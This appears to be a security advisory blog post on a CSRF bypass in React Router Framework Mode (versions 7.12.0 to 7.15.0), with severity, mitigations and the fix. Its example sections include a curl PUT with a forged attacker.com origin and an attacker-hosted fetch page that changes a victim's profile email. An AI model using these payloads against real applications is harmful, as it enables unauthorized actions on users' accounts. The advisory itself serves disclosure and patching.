Listen to this Post
The vulnerability arises in React Router’s Framework Mode, where the built‑in CSRF protection mechanism was applied only to `POST` requests. The origin check—designed to ensure that a request originates from the same domain—ran exclusively for the `POST` verb. Consequently, state‑changing requests that used the PUT, PATCH, or `DELETE` methods were never validated. An attacker could therefore craft a cross‑origin PUT, PATCH, or `DELETE` request to a vulnerable React Router application and have it be processed as if it were legitimate. This bypass allows malicious actors to perform actions on behalf of an authenticated user without their consent.
Importantly, the severity is considered low because modern browsers already provide strong defenses against such attacks. A cross‑origin PUT, PATCH, or `DELETE` request triggers a CORS preflight request. The server must respond with the appropriate CORS headers (e.g., Access‑Control‑Allow‑Origin) to permit the actual request; otherwise, the browser blocks it. Additionally, the `SameSite` cookie attribute, which is set to `Lax` by default in most modern browsers, prevents the browser from sending the session cookie for cross‑origin requests. These existing safeguards effectively block the attack vectors that the missing CSRF check would otherwise be responsible for. The vulnerability only becomes exploitable in highly specific configurations where CORS or cookie policies have been intentionally weakened.
Furthermore, the issue is confined to Framework Mode; applications using Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) are not impacted. The CSRF check was originally introduced in version 7.12.0 as an additional layer of protection, but its implementation was incomplete. The flaw was corrected in version 7.15.1, which extends the same origin validation to PUT, PATCH, and `DELETE` requests.
DailyCVE Form:
Platform: React Router Framework
Version: 7.12.0 to 7.15.0
Vulnerability: CSRF via PUT
Severity: Low
date: 2026‑06‑02
Prediction: 2026‑06‑15
What Undercode Say:
Test for CSRF bypass on PUT request curl -X PUT https://victim-app.com/api/resource \ -H "Origin: https://attacker.com" \ -H "Cookie: session=abc123" \ -d "data=malicious"
// Node.js script to simulate a cross‑origin PUT request
const http = require('http');
const options = {
hostname: 'victim-app.com',
path: '/api/resource',
method: 'PUT',
headers: { 'Origin': 'https://attacker.com' }
};
const req = http.request(options, res => {});
req.write('data=malicious');
req.end();
How Exploit:
A malicious website can host an HTML page that contains a JavaScript `fetch` call or an XMLHttpRequest that targets a vulnerable React Router endpoint using the PUT, PATCH, or `DELETE` method. Because the server does not validate the origin for these verbs, the request is processed, allowing an attacker to modify or delete data on behalf of the authenticated victim.
<!‑‑ Malicious page hosted at attacker.com ‑‑>
<script>
fetch('https://victim-app.com/api/user/profile', {
method: 'PUT',
credentials: 'include', // send session cookie
body: JSON.stringify({ email: '[email protected]' })
});
</script>
Protection:
Upgrade `react-router` to version `7.15.1` or higher.
If upgrading is not immediately possible, configure the `allowedActionOrigins` field in `react-router.config.ts` to explicitly permit only trusted origins.
Enforce strict CORS policies on the server and set `SameSite=Lax` or `SameSite=Strict` for session cookies.
Impact:
An attacker can perform state‑changing actions (e.g., updating user profiles, deleting resources, or modifying settings) by tricking an authenticated user into visiting a malicious website. The impact is limited by modern browser protections, but in configurations where CORS or cookie policies are weakened, the vulnerability could lead to data corruption or unauthorized modifications.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
